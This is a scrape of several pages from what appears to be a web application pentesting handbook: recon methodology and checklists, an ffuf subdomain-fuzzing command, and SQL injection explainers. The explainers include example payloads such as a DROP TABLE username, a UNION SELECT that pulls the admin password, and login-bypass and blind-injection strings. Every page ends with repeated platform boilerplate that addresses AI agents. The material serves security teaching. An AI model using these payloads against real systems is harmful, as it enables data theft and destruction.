\[Methodology\](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology.md) - \[Content discovery / recon\](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon.md) - \[Subdomains\](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/subdomains.md) - \[Endpoints\](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/endpoints.md) - \[Parameters\](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/parameters.md) - \[Spidering\](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/spidering.md) - \[SQL injection overview\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview.md) - \[Detection\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/detection.md) - \[Blind SQLi\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/blind-sqli.md) - \[Second-order SQLi\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/second-order-sqli.md) - \[SQLi lab setup & writeups\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups.md) - \[NoSQL injection\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/nosql-injection.md) - \[JavaScript injection (XSS)\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/javascript-injection-xss.md) - \[XSS Methodology\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/javascript-injection-xss/xss-methodology.md) - \[File Inclusion\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion.md) - \[Local file inclusion\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion/local-file-inclusion.md) - \[Directory traversal\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion/local-file-inclusion/directory-traversal.md) - \[Command injection\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/command-injection.md) - \[XXE (XML external entity) injection\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/xxe-xml-external-entity-injection.md) - \[Blind XXE\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/xxe-xml-external-entity-injection/blind-xxe.md) - \[Template injection\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/template-injection.md) - \[Server-side template injection\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/template-injection/server-side-template-injection.md) - \[Client-side template injection\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/template-injection/client-side-template-injection.md) - \[Authentication\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication.md) - \[Attacking password-based authentication\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/attacking-password-based-authentication.md) - \[Attacking MFA\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/attacking-mfa.md) - \[Authentication lab setup & writeups\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/authentication-lab-setup-and-writeups.md) - \[Cross-Site Request Forgery (CSRF)\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/cross-site-request-forgery-csrf.md) - \[Insecure deserialization\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization.md) - \[PHP\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization/php.md) - \[Java\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization/java.md) - \[Python\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization/python.md) - \[.NET\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization/.net.md) - \[Server-side request forgery (SSRF)\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/server-side-request-forgery-ssrf.md) - \[Insecure file upload\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-file-upload.md) - \[Clickjacking\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/clickjacking.md) - \[Open redirect\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/open-redirect.md) - \[Vulnerable components\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/vulnerable-components.md) - \[Race conditions\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions.md) - \[Limit overrun\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions/limit-overrun.md) - \[Prototype pollution\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/prototype-pollution.md) - \[Client-side prototype pollution\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/prototype-pollution/client-side-prototype-pollution.md) - \[APIs\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis.md) - \[API: BOLA\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis/api-bola.md) - \[API: Broken authentication\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis/api-broken-authentication.md) - \[BOPLA\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis/bopla.md) - \[API: BFLA\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis/api-bfla.md) - \[Rate limiting\](https://appsecexplained.gitbook.io/appsecexplained/bypassing-controls/rate-limiting.md) - \[WAF Bypasses\](https://appsecexplained.gitbook.io/appsecexplained/bypassing-controls/waf-bypasses.md) - \[Docker-compose.yml files\](https://appsecexplained.gitbook.io/appsecexplained/scripts/docker-compose.yml-files.md) - \[Wordpress\](https://appsecexplained.gitbook.io/appsecexplained/scripts/docker-compose.yml-files/wordpress.md) - \[SQLi testing labs\](https://appsecexplained.gitbook.io/appsecexplained/scripts/docker-compose.yml-files/sqli-testing-labs.md) - \[PHP scripts\](https://appsecexplained.gitbook.io/appsecexplained/scripts/php-scripts.md) - \[RCE Function Check\](https://appsecexplained.gitbook.io/appsecexplained/scripts/php-scripts/rce-function-check.md) - \[Wordlists\](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists.md) - \[Single characters\](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists/single-characters.md) - \[SQLi\](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists/sqli.md) - \[Getting started\](https://appsecexplained.gitbook.io/appsecexplained/code-review/getting-started.md) - \[Sinks\](https://appsecexplained.gitbook.io/appsecexplained/code-review/sinks.md) --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on a page URL with the \`ask\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/index-less-than-start-here.md?ask= \`\`\` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/index-less-than-start-here.md). # Index < START HERE ## Welcome {% hint style="info" %} This site is still a work in progress! There will be gaps and there's of course a lot more to come so make sure to check back in soon! {% endhint %} > My goal is to provide a somewhat living and up-to-date handbook for Web Application Hacking. In particular the checklists are designed not just to give you things to look for, but also spark ideas, and creative ways to find vulnerabilities. This is a curated repository of my notes and experience over many years of testing web applications. I've stripped out the sensitive information and made it more accessible for those who are learning about web application security. I hope you find it useful in your journey. Throughout this site, I try to promote ideas over specific payloads to help you solve problems and find security weaknesses that other testers or scanners may have missed. Please feel free to connect with me! You can find me on LinkedIn, or Twitch. {% embed url="" %} Please feel free to connect and message me if you have questions or feedback. {% endembed %} {% embed url="" %} In a moment of weakness I signed up to Twitter. {% endembed %} {% embed url="" %} I stream here from time to time :) {% endembed %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/index-less-than-start-here.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/index-less-than-start-here/my-courses.md). # My courses There are the courses that I've published. {% embed url="" %} {% embed url="" %} Beginner API hacking course {% endembed %} {% embed url="" %} Beginner web hacking course {% endembed %} {% embed url="" %} Intermediate web hacking course {% endembed %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/index-less-than-start-here/my-courses.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/index-less-than-start-here/how-to-get-started-from-zero.md). # How to get started from zero {% embed url="" %} How to get started with Web App Pentesting in 2023. {% endembed %} ## Beginner resources I recommend {% embed url="" %} Portswigger's Web Security Academy {% endembed %} {% embed url="" %} Rana Khalil's Web Application Security Course {% endembed %} {% embed url="" %} TryHackMe {% endembed %} {% embed url="" %} Learn JavaScript {% endembed %} ## Intermediate resources I recommend {% embed url="" %} HackTheBox (affiliate link) {% endembed %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/index-less-than-start-here/how-to-get-started-from-zero.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content/resource-of-the-week.md). # Resource of the week ## What is resource of the week? Every week we look to find an underrated resource and share it with the community. If you have something you want to share, drop it into the \[\*\*TCM Discord #tuesday-stream-questions\*\*\](https://discord.gg/tcm). ## Feb 27th 2024 When you find yourself inside a docker container and really want to escape. \* Deepce \## Feb 20th 2024 This list refreshes every 5mins! So you can be the first to a target, increase your chances of success and reduce duplicates. \* Bug Bounty Radar \## Feb 13th 2024 \* My box recommendations thanks to icanhaspii (Discord) \[https://bit.ly/AlexFaves \]() \* rs0n\\\_live \## Feb 6nd 2024 ### Critical Thinking - Bug Bounty Podcast. A great podcast with entertaining and knowledgeable hosts and guests. New episodes weekly! \* Bug bounty \* AppSec \* Video podcast {% embed url="" %} ## Jan 30th 2024 ### Rana Khalil YouTube & Academy If you want to learn about web app pentesting then this is a golden resource. \* AppSec {% embed url="" %} {% embed url="" %} ## Jan 23rd 2024 #### Mary Ellen Kennel's blog on everything DFIR! \* Building a lab \* DFIR \* Blue team \* Leadership \* A lot more... {% embed url="" %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/live-stream-content/resource-of-the-week.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content.md). # Live Stream Content ## Live Streams Every Wednesday at 12:00 ET on The Cyber Mentor YouTube Channel. {% embed url="" %} ## FAQ & Links ### How do I start Pentesting? \* Ethical Hacking in 15 Hours (FREE) \* TCM courses \* Portswigger Web Security Academy (FREE) \* TryHackMe learning paths \[https://tryhackme.com/\](https://tryhackme.com/dashboard) ### How do I become a SOC Analyst? \* Watch this video guide \### Will AI replace cybersecurity jobs? \* Nope ### How do I join the TCM discord? \* Go to \[https://discord.gg/tcm \]() --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/live-stream-content.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/parameters.md). # Parameters --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/parameters.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/subdomains.md). # Subdomains ## What is it? Subdomain discovery is the process of finding what subdomains exist given a domain name. For example, the domain \`tcm-sec.com\` might have the subdomains \`dev.tcm-sec.com\` and \`blog.tcm-sec.com\`. ### Wordlists Assetnote Seclists \[/Seclists/Discovery/DNS/\\\](https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS) ## Passive discovery \* Sublistr \* Google \* \## Active discovery \* Sublistr \* DNSRecon \* Amass \* Ffuf \`\`\` ffuf -u \-w /path/to/wordlist.txt -H "Host: FUZZ.target.com" -fs \`\`\` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/subdomains.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/endpoints.md). # Endpoints ## API-driven applications --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/endpoints.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon.md). # Content discovery / recon Content discovery is a significant part of web application penetration testing or bug bounty hunting. This process involves identifying and mapping out components, endpoints, directories, functionality, and subdomains of a target web application. Things we want to look at are: \* Subdomains \* Technology stack \* Directories and endpoints \* Parameters \* Functionality \* APIs \* JavaScript / fontend analysis \* Other open ports / services ## Checklist \*\*Web Server\*\* \* \[ \] What is the server running? \* \[ \] Operating system: Linux or Windows? \* \[ \] Web server: Apache or Nginx? Etc \* \[ \] Can we identify the version of the Web Server? \* \[ \] Are there any subdomains? \*\*Common files\*\* \* \[ \] robots.txt \* \[ \] sitemap.xml \* \[ \] .htaccess \* \[ \] security.txt \* \[ \] manifest.json \* \[ \] browserconfig.xml \* \[ \] etc \*\*Frontend checks\*\* \* \[ \] Inspect the page source for frontend scripts & information \* \[ \] Is there any sensitive information in the frontend? \* \[ \] Are there links and other things in the frontend that aren't used? \*\*Entry Points\*\* \* \[ \] What endpoints exist \* \[ \] What HTTP methods are used \* \[ \] What parameters are used \* \[ \] Fuzz for hidden endpoints, files, parameters, methods, etc \*\*Map Application Architecture\*\* \* \[ \] Step through the entire application --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology.md). # Methodology Recon, enumeration, attack surface discovery...whatever you want to call it is not really a single step or phase. We continue to enumerate throughout every step of testing an application. Even during exploitation, especially when our exploits fail, we continue to enumerate and discover more about our target application. So with that, one could argue that this is the most critical skill to develop. At the start of our engagement, we need to orient ourselves and so that we understand the target enough to uncover the full attack surface (or as much of it as possible). ## Things we want to find out ### Part 1: Apex domains, subdomains, applications and technologies Most modern web applications are a combination of technologies and if you're working on a wide scope BugBounty programme or a pentest for an organisation with many applications then you'll need to start by discovering the apex domains, subdomains as there may by many applications in-scope. #### What domains & subdomains are in scope? \* Root / apex domains \* Associated business units/brands \* Development/staging environments \* Legacy systems \* Cloud resources (AWS, Azure, GCP instances) \* Internal systems accessible externally #### What technologies exist \* Web servers and versions \* Programming languages/frameworks \* CMS platforms \* Cloud services \* Authentication systems \* Third-party integrations \* APIs and microservices \* Database systems \* Content delivery networks \* Security controls (WAF, rate limiting) ### Part 2: Application attack surface After we've identified targets, we need to understand the attack surface of individual targets. This isn't a single step, it can be iterative and exploiting a target can lead to the discovery of more endpoints, technologies or applications to attack (e.g. when we discover SSRF and gain access to internal systems). #### What endpoints exist \* API endpoints \* Admin interfaces \* Legacy/deprecated endpoints \* Mobile app endpoints \* Authentication endpoints \* File upload/download functionality \* Payment processing endpoints \* User profile/management areas \* Integration endpoints \* Webhook endpoints #### What functionality exists \* User roles and permissions \* Authentication mechanisms \* Session management \* Data processing flows \* File handling \* Input/output points \* Business logic flows \* Error handling \* Integration points \* Background processes ## Checklist ### Part 1: Initial Discovery #### Domain Reconnaissance \* \[ \] Identify root domains \* \[ \] Subdomain enumeration \* \[ \] DNS records analysis \* \[ \] Virtual hosts discovery \* \[ \] Cloud asset discovery \* \[ \] Historical DNS data #### Technology Stack Identification \* \[ \] Server fingerprinting \* \[ \] Framework detection \* \[ \] Third-party components \* \[ \] Cloud services \* \[ \] Security mechanisms \* \[ \] SSL/TLS configuration #### Infrastructure Mapping \* \[ \] IP ranges \* \[ \] Network topology \* \[ \] Load balancers \* \[ \] CDN usage \* \[ \] Cloud resources \* \[ \] Internal systems exposure ### Part 2: Application Analysis #### Endpoint Discovery \* \[ \] Directory enumeration \* \[ \] Parameter discovery \* \[ \] API endpoint mapping \* \[ \] Hidden endpoints in JS \* \[ \] Backup files \* \[ \] Development endpoints #### Functionality Mapping \* \[ \] User roles identification \* \[ \] Authentication flows \* \[ \] Session handling \* \[ \] Business logic flows \* \[ \] File operations \* \[ \] Data processing #### Content Analysis \* \[ \] JavaScript files \* \[ \] Source code leaks \* \[ \] API documentation \* \[ \] Error messages \* \[ \] Comments \* \[ \] Hidden parameters #### Security Control Analysis \* \[ \] Authentication methods \* \[ \] Authorization schemes \* \[ \] Input validation \* \[ \] Output encoding \* \[ \] Security headers \* \[ \] Rate limiting #### Integration Points \* \[ \] Third-party services \* \[ \] Payment gateways \* \[ \] Social media \* \[ \] External APIs \* \[ \] SSO providers \* \[ \] Webhooks #### Documentation \* \[ \] Architecture diagrams \* \[ \] API documentation \* \[ \] Error messages \* \[ \] Security policies \* \[ \] Known vulnerabilities \* \[ \] Previous findings #### Continuous Discovery \* \[ \] Monitor for new subdomains \* \[ \] Track technology changes \* \[ \] Document new endpoints \* \[ \] Update attack surface map \* \[ \] Review scope changes \* \[ \] Track discovered vulnerabilities Other things we may consider: \* \[ \] How are sessions handled? \* \[ \] Is it worth looking more closely at the data flow? --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/second-order-sqli.md). # Second-order SQLi ### Second-order SQL Injection Second order SQL injection (also known as Stored SQL Injection) occurs when user input is first stored in the database, and later used without being validated or encoded. The injection opportunity occurs in the second operation, hence the name "second order". \*\*A simple example:\*\* \* A vulnerable webapp allows users to save their usernames. \* An attacker can provide a malicious payload as their username, e.g. \`jeremy'); DROP TABLE users;-- -\` \* Later, when the application tries to fetch the username for an operation (e.g., greeting a returning user), it executes the malicious payload. This type of attack can lead to: 1. Data loss or corruption. 2. Compromise of the database. 3. Sensitive data exposure. 4. Remote code execution. ### Other learning resources: \* ### Writeups: \* ### Checklist: --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/second-order-sqli.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview.md). # SQL injection overview ## What is it? SQL injection is where an attacker is able to manipulate database queries made by an application. \*\*A simple example\*\* \* A vulnerable web application has the endpoint \`/search?product={productName}\` \* When a request is made, the application uses SQL to search for the product \`SELECT \* FROM products WHERE name=$productName\` \* If an attacker inserts a payload into \`{productName}\` such as \`anything' UNION SELECT password FROM users WHERE username = 'admin\` that modifies the query, sensitive data could be leaked. \* The vulnerable application sends this query to the database and the database returns the admin's password. It's important to note that a payload or attack may change depending on the application, the query, and the database. SQL injection can often lead to: \* Sensitive data exposure \* Data manipulation \* Remote code execution \* Denial of service \*\*Other learning resources:\*\* \* PostSwigger: \* Swisskeyrepo: \*\*Writeups:\*\* \* \*Have a good writeup & want to share it here? Drop me a message on LinkedIn.\* ## Checklist \* \[ \] What is the technology stack you're attacking? \* \[ \] What application/framework is being used \* \[ \] What backend DB is being used \* \[ \] Is there an ORM? \* \[ \] Verify injection points \* \[ \] URL parameters \* \[ \] Form fields \* \[ \] HTTP headers (e.g. cookies, etc) \* \[ \] Out-of-band (e.g. data retrieved from a third party) \* \[ \] Test ' and " \* \[ \] Can you trigger an error? \* \[ \] Can you trigger a different response? \* \[ \] Test with SQLmap \* \[ \] Test for login bypass \`' and 1=1-- -\` etc \* \[ \] Test for blind SQLi \* \[ \] Test for errors \* \[ \] Test for conditional responses \* \[ \] Test for conditional errors \* \[ \] Test for time delays \* \[ \] Test for out-of-band interactions \* \[ \] Test for NoSQL injection \* \[ \] Is there a blocklist? \* \[ \] Can you bypass the blocklist? \* \[ \] Encoding \* \[ \] Double encoding \* \[ \] Alternative characters \* \[ \] Alternative payloads \* \[ \] Test for second-order SQLi ## Exploitation \`\`\`sql # Basic login bypass ' AND 1=1# \`\`\` \`\`\`sql # UNION SELECT ' UNION SELECT null,null FROM users-- - \`\`\` \`\`\`sql # Blind ' AND SUBSTR((SELECT version()),1,1)='7'# CAST((SELECT example\_column FROM example\_table) AS int) \`\`\` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET 